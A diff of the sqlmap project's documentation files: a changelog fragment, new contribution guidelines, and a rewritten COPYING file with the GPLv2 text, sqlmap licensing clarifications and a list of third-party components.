+* replaced old inference algorithm with a new bisection algorithm.
+* reviewed command line parameters, now with -p it's possible to specify the parameter you know it's vulnerable to sql injection, this way the script won't perform the sql injection checks itself; removed the TOKEN parameter;
+* improved Common class, adding support for http proxy and http post method in hash_page;
+* added OptionCheck class in option.py which performs all needed checks on command line parameters and values;
+* added InjectionCheck class in injection.py which performs check on url stability, dynamics of parameters and injection on dynamic url parameters;
+* improved output methods in dump.py;
+* layout enhancement on main program file (sqlmap.py), adapted to call new option/injection classes and improvements on catching of exceptions.

doc/CONTRIBUTING.md

@@ -0,0 +1,37 @@
+# Contributing to sqlmap
+
+## Reporting bugs
+
+**Bug reports are welcome**!
+Please report all bugs on the [issue tracker](https://github.com/sqlmapproject/sqlmap/issues).
+
+### Guidelines
+
+* Before you submit a bug report, search both [open](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aopen+is%3Aissue) and [closed](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) issues to make sure the issue has not come up before. Also, check the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki) for anything relevant.
+* Make sure you can reproduce the bug with the latest development version of sqlmap.
+* Your report should give detailed instructions on how to reproduce the problem. If sqlmap raises an unhandled exception, the entire traceback is needed. Details of the unexpected behaviour are welcome too. A small test case (just a few lines) is ideal.
+* If you are making an enhancement request, lay out the rationale for the feature you are requesting. *Why would this feature be useful?*
+
+## Submitting code changes
+
+All code contributions are greatly appreciated. First off, clone the [Git repository](https://github.com/sqlmapproject/sqlmap), read the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki) carefully, go through the code yourself and [drop us an email](mailto:dev@sqlmap.org) if you are having a hard time grasping its structure and meaning. We apologize for not commenting the code enough - you could take a chance to read it through and [improve it](https://github.com/sqlmapproject/sqlmap/issues/37).
+
+Our preferred method of patch submission is via a Git [pull request](https://help.github.com/articles/using-pull-requests).
+Many [people](https://raw.github.com/sqlmapproject/sqlmap/master/doc/THANKS.md) have contributed in different ways to the sqlmap development. **You** can be the next!
+
+### Guidelines
+
+In order to maintain consistency and readability throughout the code, we ask that you adhere to the following instructions:
+
+* Each patch should make one logical change.
+* Wrap code to 76 columns when possible.
+* Avoid tabbing, use four blank spaces instead.
+* Before you put time into a non-trivial patch, it is worth discussing it privately by [email](mailto:dev@sqlmap.org).
+* Do not change style on numerous files in one single pull request, we can [discuss](mailto:dev@sqlmap.org) about those before doing any major restyling, but be sure that personal preferences not having a strong support in [PEP 8](http://www.python.org/dev/peps/pep-0008/) will likely to be rejected.
+* Make changes on less than five files per single pull request - there is rarely a good reason to have more than five files changed on one pull request, as this dramatically increases the review time required to land (commit) any of those pull requests.
+* Style that is too different from main branch will be ''adapted'' by the developers side.
+* Do not touch anything inside `thirdparty/` and `extra/` folders.
+
+### Licensing
+
+By submitting code contributions to the sqlmap developers or via Git pull request, checking them into the sqlmap source code repository, it is understood (unless you specify otherwise) that you are offering the sqlmap copyright holders the unlimited, non-exclusive right to reuse, modify, and relicense the code. This is important because the inability to relicense code has caused devastating problems for other software projects (such as KDE and NASM). If you wish to specify special license conditions of your contributions, just say so when you send them.

doc/COPYING

@@ -1,340 +1,371 @@
-		    GNU GENERAL PUBLIC LICENSE
-		       Version 2, June 1991
-
- Copyright (C) 1989, 1991 Free Software Foundation, Inc.
-                       51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
- Everyone is permitted to copy and distribute verbatim copies
- of this license document, but changing it is not allowed.
-
-			    Preamble
-
-  The licenses for most software are designed to take away your
-freedom to share and change it.  By contrast, the GNU General Public
-License is intended to guarantee your freedom to share and change free
-software--to make sure the software is free for all its users.  This
-General Public License applies to most of the Free Software
-Foundation's software and to any other program whose authors commit to
-using it.  (Some other Free Software Foundation software is covered by
-the GNU Library General Public License instead.)  You can apply it to
-your programs, too.
-
-  When we speak of free software, we are referring to freedom, not
-price.  Our General Public Licenses are designed to make sure that you
-have the freedom to distribute copies of free software (and charge for
-this service if you wish), that you receive source code or can get it
-if you want it, that you can change the software or use pieces of it
-in new free programs; and that you know you can do these things.
-
-  To protect your rights, we need to make restrictions that forbid
-anyone to deny you these rights or to ask you to surrender the rights.
-These restrictions translate to certain responsibilities for you if you
-distribute copies of the software, or if you modify it.
-
-  For example, if you distribute copies of such a program, whether
-gratis or for a fee, you must give the recipients all the rights that
-you have.  You must make sure that they, too, receive or can get the
-source code.  And you must show them these terms so they know their
-rights.
-
-  We protect your rights with two steps: (1) copyright the software, and
-(2) offer you this license which gives you legal permission to copy,
-distribute and/or modify the software.
-
-  Also, for each author's protection and ours, we want to make certain
-that everyone understands that there is no warranty for this free
-software.  If the software is modified by someone else and passed on, we
-want its recipients to know that what they have is not the original, so
-that any problems introduced by others will not reflect on the original
-authors' reputations.
-
-  Finally, any free program is threatened constantly by software
-patents.  We wish to avoid the danger that redistributors of a free
-program will individually obtain patent licenses, in effect making the
-program proprietary.  To prevent this, we have made it clear that any
-patent must be licensed for everyone's free use or not licensed at all.
-
-  The precise terms and conditions for copying, distribution and
-modification follow.
-
-		    GNU GENERAL PUBLIC LICENSE
-   TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
-
-  0. This License applies to any program or other work which contains
-a notice placed by the copyright holder saying it may be distributed
-under the terms of this General Public License.  The "Program", below,
-refers to any such program or work, and a "work based on the Program"
-means either the Program or any derivative work under copyright law:
-that is to say, a work containing the Program or a portion of it,
-either verbatim or with modifications and/or translated into another
-language.  (Hereinafter, translation is included without limitation in
-the term "modification".)  Each licensee is addressed as "you".
-
-Activities other than copying, distribution and modification are not
-covered by this License; they are outside its scope.  The act of
-running the Program is not restricted, and the output from the Program
-is covered only if its contents constitute a work based on the
-Program (independent of having been made by running the Program).
-Whether that is true depends on what the Program does.
-
-  1. You may copy and distribute verbatim copies of the Program's
-source code as you receive it, in any medium, provided that you
-conspicuously and appropriately publish on each copy an appropriate
-copyright notice and disclaimer of warranty; keep intact all the
-notices that refer to this License and to the absence of any warranty;
-and give any other recipients of the Program a copy of this License
-along with the Program.
-
-You may charge a fee for the physical act of transferring a copy, and
-you may at your option offer warranty protection in exchange for a fee.
-
-  2. You may modify your copy or copies of the Program or any portion
-of it, thus forming a work based on the Program, and copy and
-distribute such modifications or work under the terms of Section 1
-above, provided that you also meet all of these conditions:
-
-    a) You must cause the modified files to carry prominent notices
-    stating that you changed the files and the date of any change.
-
-    b) You must cause any work that you distribute or publish, that in
-    whole or in part contains or is derived from the Program or any
-    part thereof, to be licensed as a whole at no charge to all third
-    parties under the terms of this License.
-
-    c) If the modified program normally reads commands interactively
-    when run, you must cause it, when started running for such
-    interactive use in the most ordinary way, to print or display an
-    announcement including an appropriate copyright notice and a
-    notice that there is no warranty (or else, saying that you provide
-    a warranty) and that users may redistribute the program under
-    these conditions, and telling the user how to view a copy of this
-    License.  (Exception: if the Program itself is interactive but
-    does not normally print such an announcement, your work based on
-    the Program is not required to print an announcement.)
-
-These requirements apply to the modified work as a whole.  If
-identifiable sections of that work are not derived from the Program,
-and can be reasonably considered independent and separate works in
-themselves, then this License, and its terms, do not apply to those
-sections when you distribute them as separate works.  But when you
-distribute the same sections as part of a whole which is a work based
-on the Program, the distribution of the whole must be on the terms of
-this License, whose permissions for other licensees extend to the
-entire whole, and thus to each and every part regardless of who wrote it.
-
-Thus, it is not the intent of this section to claim rights or contest
-your rights to work written entirely by you; rather, the intent is to
-exercise the right to control the distribution of derivative or
-collective works based on the Program.
-
-In addition, mere aggregation of another work not based on the Program
-with the Program (or with a work based on the Program) on a volume of
-a storage or distribution medium does not bring the other work under
-the scope of this License.
-
-  3. You may copy and distribute the Program (or a work based on it,
-under Section 2) in object code or executable form under the terms of
-Sections 1 and 2 above provided that you also do one of the following:
-
-    a) Accompany it with the complete corresponding machine-readable
-    source code, which must be distributed under the terms of Sections
-    1 and 2 above on a medium customarily used for software interchange; or,
-
-    b) Accompany it with a written offer, valid for at least three
-    years, to give any third party, for a charge no more than your
-    cost of physically performing source distribution, a complete
-    machine-readable copy of the corresponding source code, to be
-    distributed under the terms of Sections 1 and 2 above on a medium
-    customarily used for software interchange; or,
-
-    c) Accompany it with the information you received as to the offer
-    to distribute corresponding source code.  (This alternative is
-    allowed only for noncommercial distribution and only if you
-    received the program in object code or executable form with such
-    an offer, in accord with Subsection b above.)
-
-The source code for a work means the preferred form of the work for
-making modifications to it.  For an executable work, complete source
-code means all the source code for all modules it contains, plus any
-associated interface definition files, plus the scripts used to
-control compilation and installation of the executable.  However, as a
-special exception, the source code distributed need not include
-anything that is normally distributed (in either source or binary
-form) with the major components (compiler, kernel, and so on) of the
-operating system on which the executable runs, unless that component
-itself accompanies the executable.
-
-If distribution of executable or object code is made by offering
-access to copy from a designated place, then offering equivalent
-access to copy the source code from the same place counts as
-distribution of the source code, even though third parties are not
-compelled to copy the source along with the object code.
-
-  4. You may not copy, modify, sublicense, or distribute the Program
-except as expressly provided under this License.  Any attempt
-otherwise to copy, modify, sublicense or distribute the Program is
-void, and will automatically terminate your rights under this License.
-However, parties who have received copies, or rights, from you under
-this License will not have their licenses terminated so long as such
-parties remain in full compliance.
-
-  5. You are not required to accept this License, since you have not
-signed it.  However, nothing else grants you permission to modify or
-distribute the Program or its derivative works.  These actions are
-prohibited by law if you do not accept this License.  Therefore, by
-modifying or distributing the Program (or any work based on the
-Program), you indicate your acceptance of this License to do so, and
-all its terms and conditions for copying, distributing or modifying
-the Program or works based on it.
-
-  6. Each time you redistribute the Program (or any work based on the
-Program), the recipient automatically receives a license from the
-original licensor to copy, distribute or modify the Program subject to
-these terms and conditions.  You may not impose any further
-restrictions on the recipients' exercise of the rights granted herein.
-You are not responsible for enforcing compliance by third parties to
-this License.
-
-  7. If, as a consequence of a court judgment or allegation of patent
-infringement or for any other reason (not limited to patent issues),
-conditions are imposed on you (whether by court order, agreement or
-otherwise) that contradict the conditions of this License, they do not
-excuse you from the conditions of this License.  If you cannot
-distribute so as to satisfy simultaneously your obligations under this
-License and any other pertinent obligations, then as a consequence you
-may not distribute the Program at all.  For example, if a patent
-license would not permit royalty-free redistribution of the Program by
-all those who receive copies directly or indirectly through you, then
-the only way you could satisfy both it and this License would be to
-refrain entirely from distribution of the Program.
-
-If any portion of this section is held invalid or unenforceable under
-any particular circumstance, the balance of the section is intended to
-apply and the section as a whole is intended to apply in other
-circumstances.
-
-It is not the purpose of this section to induce you to infringe any
-patents or other property right claims or to contest validity of any
-such claims; this section has the sole purpose of protecting the
-integrity of the free software distribution system, which is
-implemented by public license practices.  Many people have made
-generous contributions to the wide range of software distributed
-through that system in reliance on consistent application of that
-system; it is up to the author/donor to decide if he or she is willing
-to distribute software through any other system and a licensee cannot
-impose that choice.
-
-This section is intended to make thoroughly clear what is believed to
-be a consequence of the rest of this License.
-
-  8. If the distribution and/or use of the Program is restricted in
-certain countries either by patents or by copyrighted interfaces, the
-original copyright holder who places the Program under this License
-may add an explicit geographical distribution limitation excluding
-those countries, so that distribution is permitted only in or among
-countries not thus excluded.  In such case, this License incorporates
-the limitation as if written in the body of this License.
-
-  9. The Free Software Foundation may publish revised and/or new versions
-of the General Public License from time to time.  Such new versions will
-be similar in spirit to the present version, but may differ in detail to
-address new problems or concerns.
-
-Each version is given a distinguishing version number.  If the Program
-specifies a version number of this License which applies to it and "any
-later version", you have the option of following the terms and conditions
-either of that version or of any later version published by the Free
-Software Foundation.  If the Program does not specify a version number of
-this License, you may choose any version ever published by the Free Software
-Foundation.
-
-  10. If you wish to incorporate parts of the Program into other free
-programs whose distribution conditions are different, write to the author
-to ask for permission.  For software which is copyrighted by the Free
-Software Foundation, write to the Free Software Foundation; we sometimes
-make exceptions for this.  Our decision will be guided by the two goals
-of preserving the free status of all derivatives of our free software and
-of promoting the sharing and reuse of software generally.
-
-			    NO WARRANTY
-
-  11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY
-FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW.  EXCEPT WHEN
-OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES
-PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED
-OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
-MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE.  THE ENTIRE RISK AS
-TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU.  SHOULD THE
-PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING,
-REPAIR OR CORRECTION.
-
-  12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
-WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR
-REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES,
-INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING
-OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED
-TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY
-YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER
-PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE
-POSSIBILITY OF SUCH DAMAGES.
-
-		     END OF TERMS AND CONDITIONS
-
-	    How to Apply These Terms to Your New Programs
-
-  If you develop a new program, and you want it to be of the greatest
-possible use to the public, the best way to achieve this is to make it
-free software which everyone can redistribute and change under these terms.
-
-  To do so, attach the following notices to the program.  It is safest
-to attach them to the start of each source file to most effectively
-convey the exclusion of warranty; and each file should have at least
-the "copyright" line and a pointer to where the full notice is found.
-
-    <one line to give the program's name and a brief idea of what it does.>
-    Copyright (C) <year>  <name of author>
-
-    This program is free software; you can redistribute it and/or modify
-    it under the terms of the GNU General Public License as published by
-    the Free Software Foundation; either version 2 of the License, or
-    (at your option) any later version.
-
-    This program is distributed in the hope that it will be useful,
-    but WITHOUT ANY WARRANTY; without even the implied warranty of
-    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-    GNU General Public License for more details.
-
-    You should have received a copy of the GNU General Public License
-    along with this program; if not, write to the Free Software
-    Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
-
-
-Also add information on how to contact you by electronic and paper mail.
-
-If the program is interactive, make it output a short notice like this
-when it starts in an interactive mode:
-
-    Gnomovision version 69, Copyright (C) year name of author
-    Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
-    This is free software, and you are welcome to redistribute it
-    under certain conditions; type `show c' for details.
-
-The hypothetical commands `show w' and `show c' should show the appropriate
-parts of the General Public License.  Of course, the commands you use may
-be called something other than `show w' and `show c'; they could even be
-mouse-clicks or menu items--whatever suits your program.
-
-You should also get your employer (if you work as a programmer) or your
-school, if any, to sign a "copyright disclaimer" for the program, if
-necessary.  Here is a sample; alter the names:
-
-  Yoyodyne, Inc., hereby disclaims all copyright interest in the program
-  `Gnomovision' (which makes passes at compilers) written by James Hacker.
-
-  <signature of Ty Coon>, 1 April 1989
-  Ty Coon, President of Vice
-
-This General Public License does not permit incorporating your program into
-proprietary programs.  If your program is a subroutine library, you may
-consider it more useful to permit linking proprietary applications with the
-library.  If this is what you want to do, use the GNU Library General
-Public License instead of this License.
+COPYING -- Describes the terms under which sqlmap is distributed. A copy
+of the GNU General Public License (GPL) is appended to this file.
+
+sqlmap is (C) 2006-2017 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar.
+
+This program is free software; you may redistribute and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation; Version 2 (or later) with the clarifications and
+exceptions described below. This guarantees your right to use, modify, and
+redistribute this software under certain conditions. If you wish to embed
+sqlmap technology into proprietary software, we sell alternative licenses
+(contact sales@sqlmap.org).
+
+Note that the GPL places important restrictions on "derived works", yet it
+does not provide a detailed definition of that term. To avoid
+misunderstandings, we interpret that term as broadly as copyright law
+allows. For example, we consider an application to constitute a "derived
+work" for the purpose of this license if it does any of the following:
+* Integrates source code from sqlmap.
+* Reads or includes sqlmap copyrighted data files, such as xml/queries.xml
+* Executes sqlmap and parses the results (as opposed to typical shell or
+  execution-menu apps, which simply display raw sqlmap output and so are
+  not derivative works).
+* Integrates/includes/aggregates sqlmap into a proprietary executable
+  installer, such as those produced by InstallShield.
+* Links to a library or executes a program that does any of the above
+
+The term "sqlmap" should be taken to also include any portions or derived
+works of sqlmap. This list is not exclusive, but is meant to clarify our
+interpretation of derived works with some common examples. Our
+interpretation applies only to sqlmap - we do not speak for other people's
+GPL works.
+
+If you have any questions about the GPL licensing restrictions on using
+sqlmap in non-GPL works, we would be happy to help. As mentioned above,
+we also offer alternative license to integrate sqlmap into proprietary
+applications and appliances.
+
+If you received these files with a written license agreement or contract
+stating terms other than the terms above, then that alternative license
+agreement takes precedence over these comments.
+
+Source is provided to this software because we believe users have a right
+to know exactly what a program is going to do before they run it.
+
+Source code also allows you to fix bugs and add new features. You are
+highly encouraged to send your changes to dev@sqlmap.org for possible
+incorporation into the main distribution. By sending these changes to the
+sqlmap developers or via Git pull request, checking them into the sqlmap
+source code repository, it is understood (unless you specify otherwise)
+that you are offering the sqlmap project the unlimited, non-exclusive
+right to reuse, modify, and relicense the code. sqlmap will always be
+available Open Source, but this is important because the inability to
+relicense code has caused devastating problems for other Free Software
+projects (such as KDE and NASM). If you wish to specify special license
+conditions of your contributions, just say so when you send them.
+
+This program is distributed in the hope that it will be useful, but
+WITHOUT ANY WARRANTY; without even the implied warranty of
+MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+General Public License v2.0 for more details at
+http://www.gnu.org/licenses/gpl-2.0.html, or below
+
+****************************************************************************
+
+                    GNU GENERAL PUBLIC LICENSE
+                       Version 2, June 1991
+
+ Copyright (C) 1989, 1991 Free Software Foundation, Inc.,
+ 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
+ Everyone is permitted to copy and distribute verbatim copies
+ of this license document, but changing it is not allowed.
+
+                            Preamble
+
+  The licenses for most software are designed to take away your
+freedom to share and change it.  By contrast, the GNU General Public
+License is intended to guarantee your freedom to share and change free
+software--to make sure the software is free for all its users.  This
+General Public License applies to most of the Free Software
+Foundation's software and to any other program whose authors commit to
+using it.  (Some other Free Software Foundation software is covered by
+the GNU Lesser General Public License instead.)  You can apply it to
+your programs, too.
+
+  When we speak of free software, we are referring to freedom, not
+price.  Our General Public Licenses are designed to make sure that you
+have the freedom to distribute copies of free software (and charge for
+this service if you wish), that you receive source code or can get it
+if you want it, that you can change the software or use pieces of it
+in new free programs; and that you know you can do these things.
+
+  To protect your rights, we need to make restrictions that forbid
+anyone to deny you these rights or to ask you to surrender the rights.
+These restrictions translate to certain responsibilities for you if you
+distribute copies of the software, or if you modify it.
+
+  For example, if you distribute copies of such a program, whether
+gratis or for a fee, you must give the recipients all the rights that
+you have.  You must make sure that they, too, receive or can get the
+source code.  And you must show them these terms so they know their
+rights.
+
+  We protect your rights with two steps: (1) copyright the software, and
+(2) offer you this license which gives you legal permission to copy,
+distribute and/or modify the software.
+
+  Also, for each author's protection and ours, we want to make certain
+that everyone understands that there is no warranty for this free
+software.  If the software is modified by someone else and passed on, we
+want its recipients to know that what they have is not the original, so
+that any problems introduced by others will not reflect on the original
+authors' reputations.
+
+  Finally, any free program is threatened constantly by software
+patents.  We wish to avoid the danger that redistributors of a free
+program will individually obtain patent licenses, in effect making the
+program proprietary.  To prevent this, we have made it clear that any
+patent must be licensed for everyone's free use or not licensed at all.
+
+  The precise terms and conditions for copying, distribution and
+modification follow.
+
+                    GNU GENERAL PUBLIC LICENSE
+   TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
+
+  0. This License applies to any program or other work which contains
+a notice placed by the copyright holder saying it may be distributed
+under the terms of this General Public License.  The "Program", below,
+refers to any such program or work, and a "work based on the Program"
+means either the Program or any derivative work under copyright law:
+that is to say, a work containing the Program or a portion of it,
+either verbatim or with modifications and/or translated into another
+language.  (Hereinafter, translation is included without limitation in
+the term "modification".)  Each licensee is addressed as "you".
+
+Activities other than copying, distribution and modification are not
+covered by this License; they are outside its scope.  The act of
+running the Program is not restricted, and the output from the Program
+is covered only if its contents constitute a work based on the
+Program (independent of having been made by running the Program).
+Whether that is true depends on what the Program does.
+
+  1. You may copy and distribute verbatim copies of the Program's
+source code as you receive it, in any medium, provided that you
+conspicuously and appropriately publish on each copy an appropriate
+copyright notice and disclaimer of warranty; keep intact all the
+notices that refer to this License and to the absence of any warranty;
+and give any other recipients of the Program a copy of this License
+along with the Program.
+
+You may charge a fee for the physical act of transferring a copy, and
+you may at your option offer warranty protection in exchange for a fee.
+
+  2. You may modify your copy or copies of the Program or any portion
+of it, thus forming a work based on the Program, and copy and
+distribute such modifications or work under the terms of Section 1
+above, provided that you also meet all of these conditions:
+
+    a) You must cause the modified files to carry prominent notices
+    stating that you changed the files and the date of any change.
+
+    b) You must cause any work that you distribute or publish, that in
+    whole or in part contains or is derived from the Program or any
+    part thereof, to be licensed as a whole at no charge to all third
+    parties under the terms of this License.
+
+    c) If the modified program normally reads commands interactively
+    when run, you must cause it, when started running for such
+    interactive use in the most ordinary way, to print or display an
+    announcement including an appropriate copyright notice and a
+    notice that there is no warranty (or else, saying that you provide
+    a warranty) and that users may redistribute the program under
+    these conditions, and telling the user how to view a copy of this
+    License.  (Exception: if the Program itself is interactive but
+    does not normally print such an announcement, your work based on
+    the Program is not required to print an announcement.)
+
+These requirements apply to the modified work as a whole.  If
+identifiable sections of that work are not derived from the Program,
+and can be reasonably considered independent and separate works in
+themselves, then this License, and its terms, do not apply to those
+sections when you distribute them as separate works.  But when you
+distribute the same sections as part of a whole which is a work based
+on the Program, the distribution of the whole must be on the terms of
+this License, whose permissions for other licensees extend to the
+entire whole, and thus to each and every part regardless of who wrote it.
+
+Thus, it is not the intent of this section to claim rights or contest
+your rights to work written entirely by you; rather, the intent is to
+exercise the right to control the distribution of derivative or
+collective works based on the Program.
+
+In addition, mere aggregation of another work not based on the Program
+with the Program (or with a work based on the Program) on a volume of
+a storage or distribution medium does not bring the other work under
+the scope of this License.
+
+  3. You may copy and distribute the Program (or a work based on it,
+under Section 2) in object code or executable form under the terms of
+Sections 1 and 2 above provided that you also do one of the following:
+
+    a) Accompany it with the complete corresponding machine-readable
+    source code, which must be distributed under the terms of Sections
+    1 and 2 above on a medium customarily used for software interchange; or,
+
+    b) Accompany it with a written offer, valid for at least three
+    years, to give any third party, for a charge no more than your
+    cost of physically performing source distribution, a complete
+    machine-readable copy of the corresponding source code, to be
+    distributed under the terms of Sections 1 and 2 above on a medium
+    customarily used for software interchange; or,
+
+    c) Accompany it with the information you received as to the offer
+    to distribute corresponding source code.  (This alternative is
+    allowed only for noncommercial distribution and only if you
+    received the program in object code or executable form with such
+    an offer, in accord with Subsection b above.)
+
+The source code for a work means the preferred form of the work for
+making modifications to it.  For an executable work, complete source
+code means all the source code for all modules it contains, plus any
+associated interface definition files, plus the scripts used to
+control compilation and installation of the executable.  However, as a
+special exception, the source code distributed need not include
+anything that is normally distributed (in either source or binary
+form) with the major components (compiler, kernel, and so on) of the
+operating system on which the executable runs, unless that component
+itself accompanies the executable.
+
+If distribution of executable or object code is made by offering
+access to copy from a designated place, then offering equivalent
+access to copy the source code from the same place counts as
+distribution of the source code, even though third parties are not
+compelled to copy the source along with the object code.
+
+  4. You may not copy, modify, sublicense, or distribute the Program
+except as expressly provided under this License.  Any attempt
+otherwise to copy, modify, sublicense or distribute the Program is
+void, and will automatically terminate your rights under this License.
+However, parties who have received copies, or rights, from you under
+this License will not have their licenses terminated so long as such
+parties remain in full compliance.
+
+  5. You are not required to accept this License, since you have not
+signed it.  However, nothing else grants you permission to modify or
+distribute the Program or its derivative works.  These actions are
+prohibited by law if you do not accept this License.  Therefore, by
+modifying or distributing the Program (or any work based on the
+Program), you indicate your acceptance of this License to do so, and
+all its terms and conditions for copying, distributing or modifying
+the Program or works based on it.
+
+  6. Each time you redistribute the Program (or any work based on the
+Program), the recipient automatically receives a license from the
+original licensor to copy, distribute or modify the Program subject to
+these terms and conditions.  You may not impose any further
+restrictions on the recipients' exercise of the rights granted herein.
+You are not responsible for enforcing compliance by third parties to
+this License.
+
+  7. If, as a consequence of a court judgment or allegation of patent
+infringement or for any other reason (not limited to patent issues),
+conditions are imposed on you (whether by court order, agreement or
+otherwise) that contradict the conditions of this License, they do not
+excuse you from the conditions of this License.  If you cannot
+distribute so as to satisfy simultaneously your obligations under this
+License and any other pertinent obligations, then as a consequence you
+may not distribute the Program at all.  For example, if a patent
+license would not permit royalty-free redistribution of the Program by
+all those who receive copies directly or indirectly through you, then
+the only way you could satisfy both it and this License would be to
+refrain entirely from distribution of the Program.
+
+If any portion of this section is held invalid or unenforceable under
+any particular circumstance, the balance of the section is intended to
+apply and the section as a whole is intended to apply in other
+circumstances.
+
+It is not the purpose of this section to induce you to infringe any
+patents or other property right claims or to contest validity of any
+such claims; this section has the sole purpose of protecting the
+integrity of the free software distribution system, which is
+implemented by public license practices.  Many people have made
+generous contributions to the wide range of software distributed
+through that system in reliance on consistent application of that
+system; it is up to the author/donor to decide if he or she is willing
+to distribute software through any other system and a licensee cannot
+impose that choice.
+
+This section is intended to make thoroughly clear what is believed to
+be a consequence of the rest of this License.
+
+  8. If the distribution and/or use of the Program is restricted in
+certain countries either by patents or by copyrighted interfaces, the
+original copyright holder who places the Program under this License
+may add an explicit geographical distribution limitation excluding
+those countries, so that distribution is permitted only in or among
+countries not thus excluded.  In such case, this License incorporates
+the limitation as if written in the body of this License.
+
+  9. The Free Software Foundation may publish revised and/or new versions
+of the General Public License from time to time.  Such new versions will
+be similar in spirit to the present version, but may differ in detail to
+address new problems or concerns.
+
+Each version is given a distinguishing version number.  If the Program
+specifies a version number of this License which applies to it and "any
+later version", you have the option of following the terms and conditions
+either of that version or of any later version published by the Free
+Software Foundation.  If the Program does not specify a version number of
+this License, you may choose any version ever published by the Free Software
+Foundation.
+
+  10. If you wish to incorporate parts of the Program into other free
+programs whose distribution conditions are different, write to the author
+to ask for permission.  For software which is copyrighted by the Free
+Software Foundation, write to the Free Software Foundation; we sometimes
+make exceptions for this.  Our decision will be guided by the two goals
+of preserving the free status of all derivatives of our free software and
+of promoting the sharing and reuse of software generally.
+
+                            NO WARRANTY
+
+  11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY
+FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW.  EXCEPT WHEN
+OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES
+PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED
+OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
+MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE.  THE ENTIRE RISK AS
+TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU.  SHOULD THE
+PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING,
+REPAIR OR CORRECTION.
+
+  12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
+WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR
+REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES,
+INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING
+OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED
+TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY
+YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER
+PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE
+POSSIBILITY OF SUCH DAMAGES.
+
+                     END OF TERMS AND CONDITIONS
+
+****************************************************************************
+
+This license does not apply to the following components:
+
+* The Ansistrm library located under thirdparty/ansistrm/.
+* The Beautiful Soup library located under thirdparty/beautifulsoup/.
+* The Bottle library located under thirdparty/bottle/.
+* The Chardet library located under thirdparty/chardet/.
+* The ClientForm library located under thirdparty/clientform/.
+* The Colorama library located under thirdparty/colorama/.
+* The Fcrypt library located under thirdparty/fcrypt/.
+* The Gprof2dot library located under thirdparty/gprof2dot/.
+* The KeepAlive library located under thirdparty/keepalive/.
+* The Magic library located under thirdparty/magic/.
+* The MultipartPost library located under thirdparty/multipartpost/.
+* The Odict library located under thirdparty/odict/.
+* The Oset library located under thirdparty/oset/.
+* The PrettyPrint library located under thirdparty/prettyprint/.
+* The PyDes library located under thirdparty/pydes/.
+* The SocksiPy library located under thirdparty/socks/.
+* The Termcolor library located under thirdparty/termcolor/.
+* The XDot library located under thirdparty/xdot/.
+* The icmpsh tool located under extra/icmpsh/.
+
+Details for the above packages can be found in the THIRD-PARTY.md file.

doc/ChangeLog

@@ -1,539 +0,0 @@
-sqlmap (0.9-1) stable; urgency=low
-
-  * Rewritten SQL injection detection engine (Bernardo and Miroslav).
-  * Support to directly connect to the database without passing via a
-    SQL injection, -d switch (Bernardo and Miroslav).
-  * Added full support for both time-based blind SQL injection and
-    error-based SQL injection techniques (Bernardo and Miroslav).
